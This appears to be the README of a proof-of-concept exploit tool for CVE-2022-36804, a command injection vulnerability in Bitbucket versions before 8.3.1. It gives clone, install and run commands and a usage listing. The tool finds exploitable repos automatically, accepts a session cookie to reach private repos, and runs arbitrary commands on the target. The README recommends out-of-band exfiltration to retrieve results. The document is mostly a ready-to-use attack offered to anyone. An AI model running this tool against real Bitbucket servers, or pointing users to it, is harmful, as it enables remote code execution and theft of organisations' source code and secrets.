A somewhat reliable PoC exploit for CVE-2022-36804 (BitBucket Critical Command Injection). This attack generally requires public repos to be enabled, however session cookies are also compatible with this exploit. Note: this exploit includes automatic repo detection which is handy if you don't want to manually find open repos yourself.
git clone https://github.com/BenHays142/CVE-2022-36804-PoC-Exploit.git;
cd CVE-2022-36804-PoC-Exploit
python3 -m pip install -r requirements.txt
python3 main.py [target]
usage: main.py [-h] [--project PROJECT] [--repo REPO] [--skip-auto] [--session SESSION] [--command CMD] server
Exploit BitBucket Instances (< v8.3.1) using CVE-2022-36804. Exploits automagically without any extra parameters, but allows for custom settings as well.
positional arguments:
server
options:
-h, --help show this help message and exit
--project PROJECT The name of the project the repository resides in
--repo REPO The name of the repository
--skip-auto Skip the automatic finding of exploitable repos
--session SESSION Value of 'BITBUCKETSESSIONID' cookie, useful if target repo is private
--command CMD Command to execute if exploit is successful (Note: getting output isn't reliable so OOB exfil is a must)